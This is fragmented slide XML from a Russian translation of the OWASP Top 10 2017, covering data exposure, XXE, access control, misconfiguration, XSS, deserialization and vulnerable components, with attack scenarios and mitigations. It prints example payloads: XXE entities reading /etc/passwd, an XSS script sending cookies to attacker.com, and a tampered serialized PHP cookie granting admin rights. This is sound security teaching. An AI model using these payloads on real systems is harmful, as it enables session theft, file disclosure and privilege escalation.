            <a:endParaRPr lang="ru-RU" sz="65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9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CWE-359: Разглашение личных данных (Нарушение конфиденциальности)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Выполните как минимум следующее, а также ознакомьтесь с материалами в разделе "Ссылки":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Классифицируйте данные, обрабатываемые, хранимые или передаваемые приложением. Определите, какие из них являются конфиденциальными согласно законам о неприкосновенности данных, нормативам или бизнес-требованиям.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Реализуйте требования согласно классификации.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храните конфиденциальные данные без необходимости. Сразу удаляйте их или используйте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токенизацию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усечение, соответствующие стандарту PCI DSS. Данные, которые не сохраняются, нельзя украсть.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Обеспечьте шифрование всех хранимых конфиденциальных данных.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Обеспечьте применение современных и надежных алгоритмов, протоколов и ключей, а также используйте соответствующие механизмы управления ключами.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Шифруйте все передаваемые данные с помощью надежного протокола, например TLS с совершенной прямой секретностью (PFS),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приоритизацией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шифров сервером и безопасными настройками. Обеспечьте принудительное шифрование, например используя механизм принудительного использования HTTPS (HSTS).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Отключите кэширование ответов, содержащих конфиденциальные данные.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Сохраняйте пароли с помощью надежных, адаптивных функций хеширования с солью и фактором трудоемкости (задержки), таких как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Argon2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2"/>
              </a:rPr>
              <a:t>scrypt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3"/>
              </a:rPr>
              <a:t>bcrypt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4"/>
              </a:rPr>
              <a:t>PBKDF2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Проверяйте отдельно эффективность конфигурации и настройки.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A3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Разглашение конфиденциальных данных</a:t>
            </a:r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21106"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8620" y="957600"/>
          <a:ext cx="6838580" cy="2181604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1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833">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"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15"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 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
                        </a:rPr>
                        <a:t>Распространенность: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="9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 2" panose="05020102010507070707" pitchFamily="18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25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30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Вместо взлома механизмов шифрования злоумышленники крадут ключи, проводят атаки по принципу "человек посередине" или получают данные в незашифрованном виде с сервера, в процессе их передачи или из клиента пользователя, например браузера. Подобные атаки обычно проводятся вручную. Ранее полученные базы данных паролей могут быть взломаны методом подбора с использованием графических процессоров.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 протяжении последних лет данная атака является самой распространенной и опасной. Чаще всего встречается отсутствие шифрования конфиденциальных данных, а при наличии часто используются ненадежные алгоритмы, протоколы, шифры, методы хранения хешированных паролей или методы создания и управления ключами. Также легко обнаружить уязвимости на стороне сервера для передаваемых данных, но не хранимых. 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Из-за уязвимости часто страдают все персональные данные (медицинские записи, учетные данные, данные кредитных карт), которые должны быть защищены по закону, например в соответствии с Общим регламентом ЕС по защите данных (GDPR) или локальными законами о неприкосновенности данных.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="2880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280" y="1506544"/>
            <a:ext cx="990600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5880" y="1506543"/>
            <a:ext cx="990600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499230" y="1157492"/>
            <a:ext cx="628650" cy="19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26345" y="1056207"/>
            <a:ext cx="542925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01250" y="1056207"/>
            <a:ext cx="7239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80265" y="1027632"/>
            <a:ext cx="628650" cy="400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460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  <a:endParaRPr lang="ru-RU" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1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Было зафиксировано большое количество XXE-атак, включая атаки на встроенные устройства. XXE обнаруживаются в самых неожиданных местах, включая глубоко вложенные зависимости. Самым простым способом реализации атаки является загрузка (если поддерживается) вредоносного XML-файла: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пытается получить данные с сервера:</a:t>
            </a:r>
          </a:p>
          <a:p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&lt;?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xml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version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="1.0"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encoding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="ISO-8859-1"?&gt;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   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&lt;!DOCTYPE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[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  &lt;!ELEMENT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ANY &gt;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  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&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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"file:///etc/passwd" &gt;]&gt;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&lt;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&gt;&amp;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;&lt;/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исследует внутреннюю сеть сервера, заменяя вышеуказанную строку ENTITY на:</a:t>
            </a:r>
          </a:p>
          <a:p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 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&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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"https://192.168.1.1/private" &gt;]&gt;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пытается вызвать отказ в обслуживании, используя потенциально бесконечный файл:</a:t>
            </a:r>
          </a:p>
          <a:p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 &lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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"file:///dev/random" &gt;]&gt;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Приложения, в особенности веб-службы или компоненты на основе XML, являются уязвимыми в следующих случаях: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принимает XML напрямую или через выгрузку, особенно от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недоверенных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источников, или включает непроверенные данные в XML-документы, которые затем обрабатываются XML-обработчиком;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хотя бы один из XML-обработчиков приложения или веб-службы на основе SOAP использует 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определение типа документов (DTD)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Поскольку механизм отключения DTD зависит от обработчика, рекомендуется воспользоваться справочной информацией, например "Памяткой OWASP по предотвращению XXE"; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef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использует SAML для идентификации в рамках федеративной безопасности или технологии единого входа (SSO). SAML использует XML для подтверждения идентификаторов, поэтому может быть уязвим;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef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использует SOAP версии ниже 1.2. Оно может быть уязвимо для XXE-атак, если XML-сущности передаются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фреймворку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SOAP;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/>
              <a:buChar char="•"/>
            </a:pP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если приложение уязвимо для XXE-атак, то злоумышленник может также вызвать отказ в обслуживании или осуществить атаку с использованием миллиона XML-сущностей (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="77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Billion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Laughs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Стандарт подтверждения безопасности приложений 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Проверка внедрения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OWASP: Уязвимость XXE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Памятка OWASP: Предотвращение XXE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Безопасность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CWE-611: Некорректное ограничение ссылок на внешние сущности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Атака Billion Laughs (с использованием миллиона XML-сущностей)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Атака на SAML с использованием внешних сущностей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Обнаружение и эксплуатация XXE в SAML-интерфейсах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  <a:endParaRPr lang="ru-RU" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1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Обучение разработчиков имеет большое значение для выявления и противодействия XXE. Кроме того, для предотвращения XXE необходимо:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFontTx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по возможности более простые форматы данных, например JSON, и избегать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сериализации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критически важных данных;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFontTx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установить исправления или обновления для всех библиотек и обработчиков XML, используемых </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="7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приложением или ОС. Использовать проверки зависимостей. Обновить SOAP до версии 1.2 или выше;</a:t>
            </a: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отключить обработку внешних сущностей XML и DTD во всех XML-обработчиках приложения, согласно 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"Памятке OWASP по предотвращению XXE"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реализовать на сервере (по белым спискам) проверку, фильтрацию или очистку (экранирование) входных данных для предотвращения попадания вредоносных данных в XML-документы, заголовки или узлы;</a:t>
            </a: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удостовериться, что функция загрузки XML или XSL проверяет входящие файлы с использованием XSD или другой подобной методики;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="7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анализировать код масштабных и сложных приложений со множеством встраиваемых компонентов вручную, хотя инструменты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SAST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могут помочь обнаружить XXE в исходном коде.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2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Если выполнение данных требований невозможно, попробуйте использовать виртуальные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патчи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шлюзы безопасности API или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файрволы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веб-приложений (WAF) для обнаружения, мониторинга и блокировки XXE-атак. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="143510" indent="-143510">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="77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A4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Внешние сущности XML (XXE)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4311"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="2198643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099">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"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9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9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baseline="0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9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432">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1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Злоумышленники могут эксплуатировать уязвимые обработчики XML через загрузку XML или внедрение вредоносного контента в XML-документы, используя уязвимый код, зависимости или компоненты. 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 умолчанию большинство старых обработчиков XML позволяют задавать внешние сущности, URI, которые разыменовываются и вычисляются при обработке XML.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Инструменты </a:t>
                      </a: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SAST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позволяют обнаружить уязвимость путем проверки зависимостей и конфигурации. Инструменты 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DAST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требуют дополнительных операций, выполняемых вручную, для обнаружения и эксплуатации уязвимости.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Тестировщиков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выполняющих проверки вручную, необходимо обучать XXE-тестированию, поскольку подобные проверки обычно (по состоянию на 2017 г.) не проводятся.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Подобные уязвимости могут использоваться для получения данных, выполнения удаленных запросов с сервера, сканирования внутренней системы, провоцирования отказа в обслуживании, а также осуществления других атак.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уязвимых приложений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914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8750" y="106161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01250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99230" y="116638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51260" y="151454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485" y="1514539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072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использует непроверенные данные в SQL-вызове, который обращается к информации об учетной записи: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pstmt.setString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(1,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acct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ResultSet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results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=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pstmt.executeQuery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 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изменяет в браузере параметр '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acct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 для отправки желаемого номера учетной записи. Без должной проверки атакующий может получить доступ к учетной записи любого пользователя.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  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http://example.com/app/accountInfo?acct=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notmyacct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задает в браузере целевой URL. Для доступа к странице администрирования требуются права администратора.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http://example.com/app/getappInfo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admin_getappInfo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Уязвимость существует, если пользователь без аутентификации может получить доступ к этим страницам или если пользователь без прав администратора может получить доступ к странице администрирования.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Контроль доступа предполагает наличие политики, определяющей права пользователей. Обход ограничений доступа обычно приводит к несанкционированному разглашению, изменению или уничтожению данных, а также выполнению непредусмотренных полномочиями бизнес-функций. Наиболее распространенные уязвимости контроля доступа включают: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обход ограничений доступа путем изменения URL, внутреннего состояния приложения или HTML-страницы, а также с помощью специально разработанных API;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возможность изменения первичного ключа для доступа к записям других пользователей, включая просмотр или редактирование чужой учетной записи;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повышение привилегий. Выполнение операций с правами пользователя, не входя в систему, или с правами администратора, войдя в систему с правами пользователя;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манипуляции с метаданными, например повторное воспроизведение или подмена токенов контроля доступа JWT или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-файлов, а также изменение скрытых полей для повышения привилегий или некорректное аннулирование JWT;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несанкционированный доступ к API из-за некорректной настройки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междоменного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использования ресурсов (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CORS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доступ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неаутентифицированных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пользователей к страницам, требующим аутентификации, или доступ непривилегированных пользователей к привилегированным страницам. Доступ к API с отсутствующим контролем привилегий для POST-, PUT- и DELETE-методов/запросов.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rgbClr val="000000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Проактивная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 защита OWASP: Контроль доступа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Стандарт подтверждения безопасности приложений OWASP: V4 Контроль доступа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Проверка авторизации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Памятка OWASP: Контроль доступа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CWE-22: Некорректные ограничения путей для каталогов (Подмена пути)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CWE-284: Некорректное управление доступом (Авторизация)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CWE-285: Некорректная авторизация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CWE-639: Обход авторизации, используя значение ключа пользователя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PortSwigger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: Эксплуатация некорректно настроенного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междоменного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 использования ресурсов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Контроль доступа эффективен только при реализации через проверенный код на стороне сервера или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беcсерверный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API, где атакующий не может изменять проверки прав доступа или метаданные. Рекомендуется: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запрещать доступ по умолчанию, за исключением открытых ресурсов;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реализовать механизмы контроля доступа и использовать их во всех приложениях, а также минимизировать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междоменное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использование ресурсов;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контролировать доступ к моделям, используя владение записями, а не возможность пользователей создавать, просматривать, обновлять или удалять любые записи;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модели доменов для реализации специальных ограничений, относящихся к приложениям;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отключить вывод списка каталогов веб-сервера, а также обеспечить отсутствие метаданных файлов (например, .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git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и файлов резервных копий в корневых веб-каталогах;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регистрировать сбои контроля доступа и уведомлять администраторов при необходимости (например, если сбои повторяются);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ограничивать частоту доступа к API и контроллерам для минимизации ущерба от инструментов автоматизации атак;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аннулировать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токены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JWT на сервере после выхода из системы.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Разработчики и инженеры по контролю качества ПО должны проводить функциональную проверку контроля доступа и тестировать интеграцию.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A5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Недостатки контроля доступа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44767"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="219851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9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Эксплуатация контроля доступа является основным навыком злоумышленников. Инструменты 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SAST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DAST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могут обнаружить отсутствие контроля доступа, но не могут проверить его работоспособность при его наличии. Наличие контроля доступа можно обнаружить вручную, а его отсутствие можно обнаружить автоматически в некоторых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фреймворках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8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Уязвимости, связанные с контролем доступа, довольно распространены из-за отсутствия автоматического обнаружения и эффективного функционального тестирования разработчиками.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8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Контроль доступа обычно не проверяется автоматическими статическими или динамическими тестами. Тестирование вручную — наилучший способ обнаружения отсутствия или неэффективности контроля доступа, включая методы HTTP (GET, PUT и т. п.), контроллеры, прямые ссылки на объекты и т. д.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="68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 последствия: выполнение злоумышленником действий с правами пользователя или администратора; использование пользователем привилегированных функций; создание, просмотр, обновление или удаление любых записей.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730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8750" y="106161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10145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99230" y="118614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55880" y="1515872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25" y="1515872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1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Сервер приложений поставляется с образцами приложений, которые не удаляются с рабочего сервера. Эти приложения содержат известные уязвимости, позволяющие злоумышленникам скомпрометировать сервер. Если одно из этих приложений является консолью администратора, а стандартные учетные записи не менялись, то атакующий может войти в приложение и перехватить контроль над ним, используя стандартный пароль.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На сервере не отключен вывод списка файлов в каталогах, что позволяет злоумышленнику найти и выгрузить скомпилированные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-классы, после декомпиляции и обратного анализа которых можно просмотреть исходный код. В результате атакующий может обнаружить уязвимости и получить доступ к приложению.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00" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Сервер приложений настроен на отправку подробных сообщений об ошибках, включая данные о трассировке стека. Это может привести к разглашению важной информации, например о версии компонента, содержащей известные уязвимости.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№4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Поставщик облачных услуг использует стандартные разрешения общего доступа через интернет для других пользователей облака. Это позволяет получить доступ к конфиденциальной информации, доступной в облачном хранилище.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уязвимо, если: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любой из компонентов приложения недостаточно защищен или разрешения облачных сервисов некорректно настроены;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включены или присутствуют лишние функции (например, неиспользуемые порты, службы, страницы, учетные записи или привилегии);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учетные записи и пароли, создаваемые по умолчанию, используются без изменений;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обработка ошибок позволяет осуществить трассировку стека или получить слишком подробные сообщения об ошибках;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отключены или некорректно настроены последние обновления безопасности;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выбраны безопасные значения параметров защиты серверов приложений,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фреймворков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(например,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Struts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Spring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ASP.NET), библиотек и т. п.;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сервер не использует безопасные заголовки или директивы, а также если они некорректно настроены;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 устарело или имеет уязвимости (см. </a:t>
            </a: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 action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A9:2017-Использование компонентов с известными уязвимостями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Без организованной и регулярно выполняемой проверки безопасности приложений системы подвержены большему риску.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Руководство OWASP по тестированию: Управление конфигурацией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Коды ошибок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Проект OWASP: Безопасные заголовки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получения дополнительной информации по данной теме см. "Стандарт подтверждения безопасности приложений (ASVS): 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V19 Конфигурация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Руководство NIST по повышению безопасности серверов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" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>: 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Уязвимости, связанные со средой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CWE-16: Уязвимости, связанные с конфигурацией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CWE-388: Уязвимости, связанные с обработкой ошибок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Руководства/стандарты CIS по настройке безопасности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Обнаружение и перечисление контейнеров </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="9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Amazon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 S3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Необходимо реализовать процесс безопасной установки, включая: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воспроизводимость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процессов для быстрого создания безопасных, изолированных сред. Среды для разработки, контроля качества и эксплуатации должны быть настроены одинаково, но иметь разные учетные данные. Процессы должны быть автоматизированы для минимизации затрат на создание новых безопасных сред;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использование платформ только с необходимым набором функций, компонентов, документации и образцов. Удалите или не устанавливайте лишние компоненты или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проверку и актуализацию параметров настройки безопасности в соответствии с выпускаемыми бюллетенями, обновлениями и исправлениями (см. </a:t>
            </a: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 action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A9:2017-Использование компонентов с известными уязвимостями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), а также проверку разрешений облачных хранилищ (например, для контейнеров S3); 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создание сегментированной архитектуры приложения, обеспечивающей эффективное разграничение компонентов или клиентов с помощью контейнеризации или облачных групп безопасности;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использование безопасных директив для клиентов, например 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Безопасных заголовков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автоматизацию проверки эффективности используемых конфигураций и настроек во всех средах.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A6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Некорректная настройка параметров безопасности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34322"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="219851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5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Злоумышленники часто пытаются эксплуатировать неисправленные уязвимости, настроенные по умолчанию учетные записи, неиспользуемые страницы, незащищенные файлы и каталоги для получения несанкционированного доступа или информации о системе.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Настройка безопасности может быть выполнена некорректно на любом уровне приложения, включая сетевые службы, платформы, веб-службы, сервер, базу данных,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фреймворки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код, а также предустановленные виртуальные машины, контейнеры или хранилища. Для поиска уязвимых настроек, настроенных по умолчанию учетных записей, неиспользуемых служб, устаревших параметров и т. п. можно использовать автоматизированные сканеры.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Подобные уязвимости позволяют злоумышленникам получить несанкционированный доступ к системным данным или функциям, а также могут привести к полной компрометации системы.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882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8750" y="1045655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01250" y="107875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99230" y="1151620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0" y="151166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46115" y="1511659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49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 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использует непроверенные данные при создании HTML-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="9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сниппета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без их подтверждения или преобразования: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(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String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page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+= "&lt;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input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name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='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creditcard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type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='TEXT'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:b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value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+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("CC") + "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&gt;";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меняет параметр 'CC' в браузере на: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&gt;&lt;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script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document.location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br>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:b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http://www.attacker.com/cgi-bin/cookie.cgi?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:b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+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document.cookie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&lt;/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script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Идентификатор сессии жертвы отправляется на сайт злоумышленника, позволяя атакующему перехватить текущую сессию пользователя. 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Примечание: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может использовать XSS для обхода защиты от межсайтовой подмены запросов (CSRF), используемой в приложении.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3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Существует три типа XSS, обычно эксплуатируемых в браузерах:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pP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Отраженное межсайтовое выполнение сценариев (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Reflected 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XSS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или API включает непроверенные и непреобразованные данные в состав HTML. Успешная атака может привести к выполнению произвольного HTML- и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-кода в браузере жертвы. Обычно злоумышленнику необходимо убедить пользователя перейти по ссылке, ведущей на вредоносную страницу, например используя атаку типа "водопой" или рекламу.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pP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Межсайтовое выполнение хранимых сценариев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(Stored XSS)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или API сохраняет необработанные входные данные, с которыми затем взаимодействуют пользователи или администраторы. Межсайтовое выполнение хранимых сценариев обычно считается очень опасной уязвимостью.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pP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Межсайтовое выполнение сценариев на основе объектной модели документа (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DOM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XSS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):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JavaScript-фреймворки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одностраничные приложения и API, динамически добавляющие вредоносные данные на страницы, подвержены XSS на основе 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DOM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В идеале приложение не должно отправлять вредоносные данные небезопасным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API.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="3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Обычно XSS используется для перехвата сессий, кражи учетных записей, обхода МФА, замены или подмены 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DOM-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узлов (напр., троянские панели входа в систему), а также атак на браузеры, например для загрузки вредоносного ПО, регистрации нажатий и других атак на стороне клиента.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Проактивная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 защита OWASP: Кодирование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Проактивная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 защита OWASP: Проверка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Стандарт подтверждения безопасности приложений OWASP: V5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Отраженное межсайтовое выполнение сценариев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Руководство OWASP по тестированию: Межсайтовое выполнение хранимых сценариев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Руководство OWASP по тестированию: XSS на основе объектной модели документа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Предотвращение XSS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Памятка OWASP: Предотвращение XSS на основе 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DOM</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="77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Памятка OWASP: Обход фильтра XSS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Проект кодировщика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Java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 от OWASP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8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CWE-79: Некорректная нейтрализация входных данных от пользователей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PortSwigger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: Внедрение в пользовательские шаблоны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предотвращения XSS необходимо отделять непроверенные данные от активного контента браузера. Этого можно достичь следующими способами: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Использовать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с автоматическим преобразованием данных, как в последних версиях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Ruby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on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Rails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React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JS. Необходимо также проанализировать ограничения XSS-защиты каждого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фреймворка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обеспечить соответствующую обработку этих исключений.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" lvl="1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Преобразовывать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недоверенные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данные из HTTP-запросов, основываясь на контексте, в HTML-коде (теле, атрибутах,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CSS или URL) для предотвращения отраженного XSS и межсайтового выполнения хранимых сценариев.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"Памятка OWASP: Предотвращение XSS"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содержит подробные инструкции по преобразованию данных.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Применять контекстное кодирование при изменении документа в браузере пользователя для предотвращения XSS на основе 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DOM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 Если это невозможно, то применять контекстное кодирование к API браузера (см. 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"Памятку OWASP: Предотвращение XSS на основе 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DOM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"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Использовать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политику защиты содержимого (CSP)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для предотвращения XSS. Эта мера эффективна, если отсутствуют уязвимости, позволяющие внедрить код через локальные файлы (напр., используя подмену путей или уязвимые библиотеки из разрешенных сетей доставки контента).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A7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Межсайтовое выполнение сценариев (XSS)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41579"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="219851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Автоматизированные инструменты могут обнаруживать и эксплуатировать все три вида межсайтового выполнения сценариев, более того, фреймворки для их эксплуатации можно найти в открытом доступе.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Межсайтовое выполнение сценариев (XSS) является второй по распространенности уязвимостью из Топ-10 OWASP и обнаруживается в двух третях всех приложений.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b="0" i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Автоматизированные инструменты могут обнаруживать XSS автоматически, особенно в случае проработанных технологий, таких как PHP, J2EE / JSP и ASP.NET.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Межсайтовое выполнение сценариев будет иметь последствия средней степени тяжести в случае отраженного XSS или XSS на основе объектной модели документа и серьезные последствия в случае межсайтового выполнения хранимых сценариев с удаленным выполнением кода в браузере пользователя, например в виде кражи учетных данных, перехвата сессий или установки вредоносного ПО.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6385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8750" y="1052085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13965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00650" y="1156860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55880" y="1515254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240" y="1511660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047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Приложения и API уязвимы, если осуществляют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десериализацию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вредоносных или модифицированных объектов, предоставляемых злоумышленником. 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Это позволяет осуществить два основных типа атак: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атаки, связанные со структурой объектов и данных, когда злоумышленник изменяет логику приложения или удаленно выполняет произвольный код при наличии доступных приложению классов, поведение которых может меняться во время или после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;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атаки с подменой данных, например связанные с управлением доступом, когда используются существующие структуры данных, но изменяется содержимое.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Сериализация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может использоваться в приложениях для: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удаленного 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межпроцессного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взаимодействия (RPC/IPC); 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проводных протоколов, веб-служб, брокеров сообщений;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кэширования или сохранения данных;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баз данных, серверов кэширования, файловых систем; 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куки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-файлов HTTP, параметров HTML-форм,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токенов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аутентификации API. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:b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</a:rPr>
            </a:b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React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-приложение вызывает набор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микрослужб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Spring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Boot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Будучи функциональными программистами, разработчики попытались обеспечить неизменяемость своего кода. Используемое ими решение заключается в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сериализации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состояния пользователя и передаче его с каждым запросом. Злоумышленник, заметивший подпись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-объекта "rO0", может использовать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Serial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Killer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удаленного выполнения кода на сервере приложения.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На PHP-форуме используется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сериализация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PHP-объектов для хранения "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суперкуки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", содержащих идентификатор, роль,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пароля и другие данные пользователя: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a:4:{i:0;i:132;i:1;s:7:"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Mallory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";i:2;s:4:"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user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i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}</a:t>
            </a:r>
          </a:p>
          <a:p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изменяет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сериализованный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объект, наделяя себя привилегиями администратора:</a:t>
            </a:r>
          </a:p>
          <a:p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a:4:{i:0;i:1;i:1;s:5:"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Alice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";i:2;s:5:"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</a:t>
            </a:r>
          </a:p>
          <a:p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i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}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Памятка OWASP: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Десериализация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4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Проактивная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 защита OWASP: Обязательная проверка всех входных данных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Стандарт подтверждения безопасности приложений OWASP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AppSecEU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2016: Как пережить апокалипсис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десериализации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Java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7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OWASP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AppSecUSA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 2017: Пятница, 13-е — Джейсон под ударом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CWE-502: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Десериализация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недоверенных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 данных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Безопасность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десериализации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Java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OWASP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AppSec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Cali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 2015: Консервируем объекты</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-17145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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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Единственным безопасным решением будет игнорирование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сериализованных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объектов от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недоверенных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источников или использование среды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допускающей только примитивные типы данных.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Если это невозможно, рекомендуется следующее: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Проверка целостности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сериализованных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объектов, например с помощью цифровых подписей, для предотвращения создания вредоносных объектов или подмены данных.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Ввод строгих ограничений типов при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перед созданием объекта, поскольку ожидаемым является поддающийся определению набор классов. Существуют методы обхода подобной защиты, поэтому полагаться исключительно на нее не рекомендуется.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Изоляция и запуск кода, осуществляющего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десериализацию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в среде с минимальными привилегиями, если это возможно.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Журналирование исключений и ошибок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например непредусмотренных типов входных данных или исключений при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Ограничение или контроль входящих и исходящих сетевых подключений контейнеров или серверов, осуществляющих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десериализацию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Отслеживание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 предупреждением о фактах продолжительной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/>
              <a:t>A8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="200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Небезопасная десериализация</a:t>
            </a:r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47633"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="219851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Сложность эксплуатации: </a:t>
                      </a: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50" b="0" i="0" dirty="0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Эксплуатировать </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="750" b="0" i="0" dirty="0" err="1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десериализацию</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="750" b="0" i="0" dirty="0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сложно, поскольку готовые </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="750" b="0" i="0" dirty="0" err="1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эксплойты</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="750" b="0" i="0" dirty="0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редко можно использовать без их изменения или доработки.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Данная уязвимость включена в Топ-10 по результатам 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отраслевых исследований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а не по количественным показателям.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Некоторые инструменты могут обнаруживать ошибки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десериализации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но для их подтверждения обычно требуется участие специалиста. Ожидается, что по мере разработки новых инструментов обнаружения и устранения ошибок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десериализации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данных об их распространенности станет больше.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ошибок </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="70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десериализации</a:t>
                      </a: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нельзя недооценивать. Подобные ошибки могут привести к удаленному выполнению кода, одной из самых опасных уязвимостей.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25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8750" y="1059705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1250" y="1059705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44235" y="118614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5880" y="151166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080" y="1511659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78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spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="85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Компоненты обычно запускаются с привилегиями приложения, поэтому уязвимость в любом из компонентов может привести к серьезным последствиям. Уязвимость может появиться случайно (например, из-за ошибки в коде) или преднамеренно (например,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бэкдор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 Вот несколько примеров эксплуатации уязвимостей, обнаруженных в компонентах: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CVE-2017-5638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уязвимость в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Struts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2, позволяющая удаленно выполнить произвольный код на сервере, стала причиной нескольких серьезных взломов;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уязвимости в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интернете вещей (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IoT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)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зачастую сложно или невозможно устранить, а это может привести к серьезным последствиям (например, в случае биомедицинских приборов).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef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Существуют автоматизированные инструменты, позволяющие злоумышленникам находить уязвимые или некорректно настроенные системы. Например, поисковик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Shodan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IoT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позволяет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обнаружить устройства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в которых до сих пор не устранена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уязвимость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Heartbleed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которая была исправлена в апреле 2014 года</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="8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br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
